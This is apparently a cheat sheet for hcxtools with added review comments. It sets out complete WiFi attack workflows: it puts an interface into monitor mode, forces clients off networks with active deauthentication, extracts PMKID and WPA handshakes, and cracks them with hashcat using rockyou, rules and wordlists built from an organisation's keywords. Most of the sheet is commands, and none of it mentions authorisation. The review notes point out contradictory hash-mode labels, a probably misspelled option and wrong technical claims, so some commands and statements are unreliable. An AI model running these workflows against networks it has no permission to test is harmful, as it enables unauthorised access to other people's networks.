
hcxtools

# Build and install from the upstream source tree.
# NOTE(review): this builds whatever commit is at HEAD and installs it with root
# privileges; check out a tagged release and review the tree before running
# `sudo make install`. The build prerequisites are listed further down.
git clone https://github.com/ZerBea/hcxtools.git
cd hcxtools
make
sudo make install
# Alternatively, install a distribution package.
# Ubuntu/Debian
sudo apt-get install hcxtools

# Arch
sudo pacman -S hcxtools

# Homebrew (macOS)
brew install hcxtools
# Build prerequisites for the source build above (dev headers for OpenSSL and libcurl).
# Ubuntu/Debian
sudo apt-get install libssl-dev pkg-config libcurl4-openssl-dev

# CentOS/RHEL
sudo yum install openssl-devel pkgconfig libcurl-devel

# Alpine
apk add openssl-dev curl-dev
# Confirm the tools are on PATH and which version was installed.
hcxpcapngtool --version
hcxhashtool --version
hcxeiutool --version
| Tool | Function | Input | Output |
| --- | --- | --- | --- |
| hcxpcapngtool | Convert pcapng to hashcat/John | .pcapng | .hccapx, .txt, .16800 |
| hcxhashtool | Filter and analyze hashes | .txt, .16800 | Cleaned hashes, statistics |
| hcxeiutool | Manage ESSID lists | .txt, wordlist | ESSID database |
| hcxdumptool | Live WiFi capture (separate tool) | Interface | .pcapng |
| hcxworkstation | GUI wrapper (optional) | - | - |
# hcxpcapngtool: convert a .pcapng capture into hash files for hashcat/John.
# Convert PMKID captures to hashcat format (16800)
hcxpcapngtool -o output.16800 capture.pcapng

# Output format: 16800 (hashcat PMKID mode)
# Single PMKID hash (hashcat mode 16800)
# NOTE(review): the next line is a sample hash line, not a command. Its
# WPA*NN*...*  layout is the multi-field format associated with mode 22000
# rather than the single-line 16800 form the comment above names — confirm
# which format this command actually emits.
WPA*02*hash*mac_ap*mac_sta*essid*

# Output shows PMKID from beacon/association
# Generate hccapx (for hashcat and John)
hcxpcapngtool -o output.hccapx capture.pcapng

# Convert hccapx to John WPA format
hcxhashtool -o output.txt -t john output.hccapx
# Generate all popular formats at once
# NOTE(review): these runs differ only in the output filename; nothing here
# selects a hash type (compare the --type examples below), so the extension
# alone does not guarantee what the file contains — check with -s afterwards.
hcxpcapngtool -o output.hashes capture.pcapng
hcxpcapngtool -o output.hccapx capture.pcapng
hcxpcapngtool -o output.16800 capture.pcapng  # PMKID only
# NOTE(review): the "WPA3" label below conflicts with the later note that
# mode 22000 "includes WPA2/3 improvements"; this sheet is inconsistent about
# which mode covers WPA3 — confirm before relying on either label.
hcxpcapngtool -o output.22000 capture.pcapng  # WPA3
# Get summary of what's in the capture
hcxpcapngtool -s capture.pcapng

# Output:
# PMKID (16800): 5 hashes
# WPA handshake (2500): 3 networks
# WPA3 PBKDF2 (22000): 0 hashes
# WPA3 SCRYPT (22001): 0 hashes
# Extract only specific ESSID
hcxpcapngtool -o output.16800 --essid-filter "MyNetwork" capture.pcapng

# Extract multiple ESSIDs
hcxpcapngtool -o output.16800 --essid-filter "Network1,Network2,Network3" capture.pcapng
# Extract only hashes from specific AP (BSSID)
hcxpcapngtool -o output.16800 --bssid-filter "AA:BB:CC:DD:EE:FF" capture.pcapng

# Extract multiple APs
hcxpcapngtool -o output.16800 --bssid-filter "AA:BB:CC:DD:EE:FF,11:22:33:44:55:66" capture.pcapng
# Merge PCAPNG files before conversion
# mergecap is shipped with Wireshark, not with hcxtools.
mergecap -w merged.pcapng capture1.pcapng capture2.pcapng capture3.pcapng

# Then convert merged file
hcxpcapngtool -o output.16800 merged.pcapng
# PMKID only (16800) - fast cracking
hcxpcapngtool -o pmkid.txt --type pmkid capture.pcapng

# WPA handshakes only (2500)
hcxpcapngtool -o handshakes.txt --type wpa capture.pcapng

# All supported types
hcxpcapngtool -o all_hashes.txt capture.pcapng
# hcxhashtool: filter, deduplicate, inspect and convert hash files.
# Clean hash file of duplicates
hcxhashtool -o cleaned.txt input.txt

# Removes duplicate PMKID and WPA hashes
# Remove hashes with weak credentials/short SSIDs
# NOTE(review): --minimum-essid-length filters on ESSID length only; nothing
# here inspects credentials, so "weak credentials" above overstates what the
# command does.
hcxhashtool -o filtered.txt --minimum-essid-length 8 input.txt

# Only keep SSIDs with 8+ characters
# Get detailed hash information
hcxhashtool --info input.txt

# Output:
# (sample output as given on this sheet)
# Total hashes: 42
# PMKID (16800): 15
# WPA (2500): 27
# Weak credentials: 3
# Duplicate SSIDs: 5
# Get just ESSIDs from hashes
hcxhashtool -o essids.txt --essid-only input.txt

# Get BSSID/AP addresses only
hcxhashtool -o bssids.txt --bssid-only input.txt
# Organize hashes by network name
hcxhashtool -o sorted.txt --sort essid input.txt

# Useful for targeted wordlist generation
# Convert hccapx to text format
# NOTE(review): the tool table above lists hcxhashtool input as .txt/.16800,
# while these three examples feed it .hccapx — confirm the installed version
# accepts hccapx input before relying on this.
hcxhashtool -o output.txt -t text input.hccapx

# Convert to John WPA format
hcxhashtool -o output.txt -t john input.hccapx

# Convert to hashcat format
hcxhashtool -o output.txt -t hashcat input.hccapx
# hcxeiutool: ESSID list handling and wordlist generation.
# NOTE(review): the tool table above lists hcxeiutool input as .txt/wordlist,
# but several examples here pass a .pcapng — confirm which input types the
# installed version accepts.
# Extract ESSIDs from capture
hcxeiutool -i capture.pcapng -o essids.txt

# Generates list of all network names in capture
# Combine multiple ESSID sources
hcxeiutool -i capture.pcapng -o combined_essids.txt
# NOTE(review): appending rockyou.txt turns combined_essids.txt into a full
# wordlist rather than an ESSID list; keep the two separate if the
# "--essid context" mentioned below expects ESSIDs only.
cat /usr/share/wordlists/rockyou.txt >> combined_essids.txt

# Use for targeted password cracking with --essid context
# Keep only ESSID 6+ characters
hcxeiutool -i essids.txt -o filtered.txt --minimum-length 6

# Removes single-char and very short network names
# Check ESSID list for valid characters
hcxeiutool -i essids.txt --validate

# Reports invalid UTF-8 or problematic characters
# Create wordlist based on captured ESSIDs
hcxeiutool -i capture.pcapng -o wordlist.txt --generate

# Adds variations: uppercase, l33t speak, common patterns
# End-to-end PMKID workflow: capture, convert, clean, crack.
# Put interface in monitor mode
# airmon-ng is part of aircrack-ng, not hcxtools.
sudo airmon-ng start wlan0

# Capture traffic (will grab PMKID from beacons)
# NOTE(review): PMKID is carried in the AP's association/first-EAPOL exchange
# rather than in beacon frames — confirm the comment above.
# NOTE(review): --active-deauthentication transmits frames (see "deauth forces
# handshake" further down), so this is not a passive capture; deauth bursts are
# exactly the traffic a wireless IDS is built to flag.
sudo hcxdumptool -i wlan0mon -o capture.pcapng --active-deauthentication

# Wait 30-60 seconds for PMKID captures
# Press Ctrl+C to stop
# Convert capture to hashcat PMKID format
hcxpcapngtool -o pmkid.16800 capture.pcapng

# View extracted hashes
cat pmkid.16800
# Check hash statistics
hcxpcapngtool -s capture.pcapng

# Should show "PMKID (16800): X hashes"
# Remove duplicates if capturing multiple times
hcxhashtool -o pmkid_cleaned.16800 pmkid.16800

# Check for weak networks
hcxhashtool --info pmkid_cleaned.16800
# PMKID is fast to crack (mode 16800)
hashcat -m 16800 -a 0 pmkid_cleaned.16800 rockyou.txt

# Or with rules
hashcat -m 16800 -a 0 pmkid_cleaned.16800 rockyou.txt -r best64.rule
# Handshake capture and extraction.
# Live capture with hcxdumptool (deauth forces handshake)
sudo hcxdumptool -i wlan0mon -o capture.pcapng --active-deauthentication

# Or use airodump-ng alternative
# NOTE(review): airodump-ng is run without sudo here while every other capture
# line on this sheet uses it; monitor-mode capture needs the same privileges
# either way. Its -w argument is documented as an output prefix, so confirm
# the filename it actually produced before passing it to hcxpcapngtool.
airodump-ng -w capture.pcapng wlan0mon
# Extract WPA handshakes (mode 2500)
hcxpcapngtool -o handshakes.2500 capture.pcapng

# View hashes
cat handshakes.2500
# For WPA3 or newer captures
hcxpcapngtool -o output.22000 capture.pcapng

# Hashcat mode 22000 includes WPA2/3 improvements
# hccapx works with hashcat and John the Ripper
hcxpcapngtool -o output.hccapx capture.pcapng

# Convert hccapx to other formats
hcxhashtool -o output.2500 -t hashcat output.hccapx
hcxhashtool -o output.txt -t john output.hccapx
# hcxdumptool capture options (hcxdumptool is a separate project from hcxtools,
# as the tool table above notes).
# NOTE(review): every example below writes to the same capture.pcapng; whether
# hcxdumptool overwrites or appends is not stated here, so use distinct output
# names if individual runs must be kept.
# Put interface in monitor mode
sudo airmon-ng start wlan0

# Capture with hcxdumptool (produces .pcapng)
sudo hcxdumptool -i wlan0mon -o capture.pcapng

# Ctrl+C after 60+ seconds
# Force clients to reconnect and generate handshakes
sudo hcxdumptool -i wlan0mon -o capture.pcapng --active-deauthentication

# Useful for getting complete 4-way handshakes
# Monitor all channels to capture more networks
sudo hcxdumptool -i wlan0mon -o capture.pcapng --hop

# Captures from multiple channels for diverse targets
# Focus on single AP
sudo hcxdumptool -i wlan0mon -o capture.pcapng --bssid AA:BB:CC:DD:EE:FF

# Faster, more hashes from target network
# After capturing with hcxdumptool
hcxpcapngtool -o output.16800 capture.pcapng

# Shows PMKID and handshake extraction
hcxpcapngtool -s capture.pcapng
# hashcat invocations and a short end-to-end workflow.
# Extract and crack PMKID (fast, 1-2 minutes)
hcxpcapngtool -o pmkid.16800 capture.pcapng
hashcat -m 16800 -a 0 pmkid.16800 wordlist.txt

# Mode 16800 = PMKID|ESSID|MAC
# Extract and crack WPA2/3 (slower, 30+ minutes to hours)
# NOTE(review): "WPA2/3" is tied to mode 2500 here, while elsewhere on this
# sheet WPA3 is tied to 22000 — the sheet is inconsistent about which mode
# covers WPA3.
hcxpcapngtool -o wpa.2500 capture.pcapng
hashcat -m 2500 -a 0 wpa.2500 rockyou.txt

# Mode 2500 = WPA-PBKDF2-SHA1
# PMKID with rules (faster)
# NOTE(review): "(faster)" contradicts the tip at the end of this sheet that
# rules can double crack time; rules widen the search, they do not speed it up.
hashcat -m 16800 -a 0 pmkid.16800 rockyou.txt -r best64.rule

# WPA with rules
hashcat -m 2500 -a 0 wpa.2500 rockyou.txt -r best64.rule
# NOTE(review): hashcat -d selects device IDs as enumerated on the local
# machine; the vendor labels on the next three examples are illustrative, not a
# fixed mapping.
# NVIDIA GPU
hashcat -m 16800 -a 0 pmkid.16800 rockyou.txt -d 1

# AMD GPU
hashcat -m 16800 -a 0 pmkid.16800 rockyou.txt -d 2

# CPU
hashcat -m 16800 -a 0 pmkid.16800 rockyou.txt -d 3
# Merge all PMKID captures
cat pmkid1.16800 pmkid2.16800 pmkid3.16800 > combined.16800

# Deduplicate
hcxhashtool -o dedup.16800 combined.16800

# Crack
hashcat -m 16800 -a 0 dedup.16800 rockyou.txt
# 1. Start capture with hcxdumptool (2-5 min)
sudo hcxdumptool -i wlan0mon -o capture.pcapng --active-deauthentication

# 2. Extract PMKID hashes (seconds)
hcxpcapngtool -o pmkid.16800 capture.pcapng

# 3. Verify extraction
hcxpcapngtool -s capture.pcapng

# 4. Clean hashes
hcxhashtool -o pmkid_clean.16800 pmkid.16800

# 5. Crack (1-5 min with small wordlist, GPU)
hashcat -m 16800 -a 0 pmkid_clean.16800 rockyou.txt

# Total: Fast results possible in under 30 minutes

Comprehensive Handshake Workflow (1-2 hours)

# Longer handshake workflow, followed by a multi-network variant.
# 1. Extended capture with deauth (30-60 min)
sudo hcxdumptool -i wlan0mon -o capture.pcapng --active-deauthentication --active-deauthentication-duration 60

# 2. Extract both PMKID and handshakes (seconds)
# NOTE(review): these three runs differ only in the output filename; nothing
# here selects a hash type (compare the --type examples earlier), so the
# .16800/.2500 names may not reflect the contents — confirm with step 3.
hcxpcapngtool -o all.txt capture.pcapng
hcxpcapngtool -o pmkid.16800 capture.pcapng
hcxpcapngtool -o wpa.2500 capture.pcapng

# 3. Analyze what was captured
hcxpcapngtool -s capture.pcapng

# 4. Try PMKID first (faster)
hashcat -m 16800 -a 0 pmkid.16800 rockyou.txt

# 5. If PMKID fails, try WPA
hashcat -m 2500 -a 0 wpa.2500 rockyou.txt -r best64.rule

# Total: Comprehensive with multiple attempts
# 1. Capture multiple networks with channel hopping
sudo hcxdumptool -i wlan0mon -o multi.pcapng --hop --active-deauthentication

# 2. Extract all hashes
hcxpcapngtool -o all_pmkid.16800 multi.pcapng

# 3. Get statistics by ESSID
hcxhashtool --info all_pmkid.16800

# 4. Create ESSID wordlist
hcxeiutool -i multi.pcapng -o essids.txt

# 5. Crack with ESSID context (optional)
# NOTE(review): this command is identical to the plain PMKID crack in step 4
# of the previous workflow; the "ESSID context" named in the comment is not
# actually applied here (essids.txt from step 4 is unused).
hashcat -m 16800 -a 0 all_pmkid.16800 rockyou.txt

# 6. Sort results by target
# This sorts the input hash file, not hashcat's cracked output.
hcxhashtool -o sorted.16800 --sort essid all_pmkid.16800
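# Targeted-wordlist workflow: build a wordlist from captured ESSIDs plus a
# custom list, dedupe it, and try it before the generic list.
# 1. Extract ESSIDs from capture
hcxeiutool -i capture.pcapng -o essids.txt

# 2. Create targeted wordlist based on ESSID names
# (company names, location, keywords)
cat essids.txt custom_wordlist.txt > targeted.txt

# 3. Remove duplicates
# `sort -u` replaces the `sort | uniq` pipeline; LC_ALL=C makes the comparison
# byte-wise so the result does not depend on the caller's locale collation.
LC_ALL=C sort -u targeted.txt > wordlist_final.txt

# 4. Extract hashes
hcxpcapngtool -o pmkid.16800 capture.pcapng

# 5. Try targeted wordlist first
hashcat -m 16800 -a 0 pmkid.16800 wordlist_final.txt

# 6. Fall back to rockyou if no success
hashcat -m 16800 -a 0 pmkid.16800 rockyou.txt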
# Advanced options and troubleshooting.
# Some tools support signal filtering
# NOTE(review): "--min-rssid" looks like a misspelling of an RSSI option, and
# this is the only hcxdumptool line on the sheet run without sudo — check the
# installed tool's --help before using it.
hcxdumptool -i wlan0mon -o capture.pcapng --min-rssid -30

# Only capture strong signals (better quality hashes)
# Detailed conversion output
hcxpcapngtool -v capture.pcapng -o output.16800

# Shows each hash extracted, filtering applied, statistics
# Get just the hash and ESSID
# NOTE(review): earlier examples use --essid-only for this; confirm which
# spelling the installed version accepts.
hcxhashtool -o minimal.txt --essid input.hccapx

# Format varies by output type
# Check if capture has valid data
hcxpcapngtool -s capture.pcapng

# If count is 0, capture may be corrupted or empty
file capture.pcapng  # Verify it's valid pcapng
# Verify input file format
file capture.hccapx
file capture.pcapng

# hcxtools primarily works with pcapng and hccapx
# Convert if needed with tshark or mergecap
# Check file permissions
ls -la capture.pcapng

# Try with sudo if permission denied
# NOTE(review): prefer fixing the file's ownership/permissions over running the
# parser as root; a converter that reads capture data taken off the air should
# not need elevated privileges.
sudo hcxpcapngtool -o output.16800 capture.pcapng

# Try explicit format
# NOTE(review): this uses --format=hashcat while the last example below uses
# -t hashcat (a flag the sheet otherwise shows for hcxhashtool); the two cannot
# both be right — confirm against the installed tool's --help.
hcxpcapngtool -o output.16800 --format=hashcat capture.pcapng
# Verify hash format compatibility
file output.16800
head -1 output.16800

# Check hashcat version supports the mode
hashcat --version

# If mismatch, reconvert with specific format
hcxpcapngtool -o output.txt -t hashcat capture.pcapng
  • PMKID First: PMKID hashes (16800) crack much faster than full handshakes—prioritize capture methods that get PMKID
  • Deduplicate Early: Use hcxhashtool to remove duplicates before cracking to save compute time
  • Combine Captures: If capturing over multiple sessions, merge .pcapng files with mergecap and deduplicate
  • Channel Hopping: Use hcxdumptool --hop to capture across all channels and increase hash collection
  • Targeted Wordlists: Extract ESSIDs with hcxeiutool and build wordlists around organization keywords
  • Verify Before Cracking: Run hcxpcapngtool -s to confirm hashes extracted before spending GPU time
  • Save Original Capture: Keep the .pcapng file—you can extract different formats later without recapturing
  • Use Rules Wisely: Rules can double crack time but find 15-30% more passwords—test without rules first
  • GPU Acceleration: PMKID mode 16800 benefits hugely from GPU—use hashcat with NVIDIA/AMD driver support
  • Test Hash Quality: hcxhashtool --info shows signal strength and other metadata—weak signals may not crack